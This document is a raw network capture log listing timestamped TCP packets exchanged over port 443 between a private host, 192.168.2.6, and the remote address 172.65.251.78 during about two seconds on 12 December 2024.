Dec 12, 2024 13:05:27.854882956 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.854918957 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.854965925 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.865381002 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.865410089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.865458965 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.865467072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.865493059 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.865515947 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.882988930 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.883011103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.883097887 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.883097887 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.883112907 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.883156061 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.889205933 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.889224052 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.889314890 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.889326096 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.889367104 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.896708965 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.896737099 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.896934986 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.896944046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.896987915 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.904423952 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.904452085 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.904532909 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.904546976 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.904587984 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.912101984 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.912142992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.912199974 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.912211895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.912225008 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.912256002 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.918785095 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.918812990 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.918890953 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.918900013 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.918941975 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.046746969 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.046772957 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.046891928 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.046922922 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.046971083 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.057334900 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.057348967 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.057466984 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.057492971 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.057544947 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.075267076 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.075284004 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.075546026 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.075552940 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.075604916 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.082547903 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.082562923 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.082659006 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.082667112 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.082709074 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.088983059 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.088999987 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.089068890 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.089080095 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.089123011 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.096946001 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.096972942 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.097054958 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.097059965 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.097101927 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.104516029 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.104538918 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.104626894 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.104631901 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.104676008 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.112061024 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.112076998 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.112160921 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.112165928 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.112212896 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.238773108 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.238799095 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.238862038 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.238887072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.238903999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.238924026 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.250849962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.250876904 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.250956059 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.250961065 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.251086950 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.257519960 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.257563114 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.257589102 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.257595062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.257649899 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.272495031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.272526026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.272581100 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.272593021 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.272619009 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.280049086 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.280081987 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.280128956 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.280138016 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.280165911 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.287569046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.287591934 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.287626982 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.287635088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.287662029 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.295253038 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.295279980 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.295320034 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.295325994 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.295346975 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.302045107 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.302067041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.302122116 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.302128077 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.343209982 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.429455042 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.429481030 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.429591894 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.429620028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.429671049 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.442853928 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.442877054 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.442945004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.442950964 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.442996979 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.449047089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.449074030 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.449136019 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.449141979 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.449167967 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.449192047 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.467283010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.467308044 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.467438936 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.467463970 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.467509985 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.473505020 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.473526955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.473613977 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.473618031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.473659992 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.481457949 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.481478930 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.481580019 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.481584072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.481627941 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.488084078 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.488104105 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.488183022 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.488188028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.488230944 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.495605946 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.495628119 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.495697975 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.495706081 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.495743990 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.621876001 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.621901035 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.622004032 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.622034073 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.622071981 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.634051085 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.634078026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.634136915 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.634171009 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.634191036 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.634212971 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.642102957 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.642127991 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.642173052 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.642179012 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.642200947 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.642224073 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.657396078 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.657418013 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.657469988 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.657478094 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.657515049 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.657532930 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.664623022 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.664647102 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.664707899 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.664716005 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.664755106 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.666785955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.666846037 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.673484087 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.673512936 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.673557997 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.673563957 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.673599005 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.681854963 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.681880951 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.681956053 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.681960106 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.688915968 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.688944101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.688997030 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.689002991 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.689044952 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.815982103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.816009045 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.816149950 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.816176891 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.816220999 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.828082085 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.828108072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.828162909 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.828169107 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.828222990 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.843998909 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.844024897 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.844109058 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.844118118 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.844183922 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.851197958 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.851214886 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.851329088 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.851336002 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.851383924 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.859056950 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.859121084 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.859188080 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.859199047 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.859251976 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.865603924 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.865622044 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.865746021 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.865752935 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.865793943 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.873235941 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.873253107 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.873320103 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.873326063 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.873363972 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.881062031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.881078959 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.881148100 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:28.881155014 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:28.881202936 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.007958889 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.008024931 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.008050919 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.008080006 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.008107901 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.008133888 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.020044088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.020065069 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.020123005 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.020131111 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.020167112 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.020186901 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.035965919 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.035985947 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.036076069 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.036082983 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.036123037 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.043153048 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.043178082 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.043246031 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.043253899 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.043294907 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.050806046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.050822973 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.050918102 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.050925016 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.050965071 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.058476925 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.058494091 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.058561087 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.058568001 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.058607101 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.065244913 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.065262079 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.065356016 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.065370083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.065529108 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.072928905 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.072946072 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.073015928 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.073026896 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.073066950 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.199868917 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.199892998 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.199959993 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.199995041 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.200011969 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.200042963 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.212106943 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.212127924 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.212208986 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.212217093 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.212259054 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.228426933 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.228450060 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.228559971 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.228590012 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.228637934 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.235203028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.235222101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.235290051 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.235326052 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.235363007 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.243061066 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.243074894 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.243135929 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.243161917 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.243185997 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.243204117 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.250561953 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.250577927 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.250659943 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.250686884 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.250727892 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.257276058 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.257289886 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.257349968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.257374048 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.257411957 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.265044928 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.265064955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.265105009 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.265130043 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.265150070 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.265170097 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.391999006 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.392021894 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.392111063 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.392143965 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.392184973 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:29.404151917 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.404194117 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:29.404232025 CET	49726	443	192.168.2.6	172.65.251.78
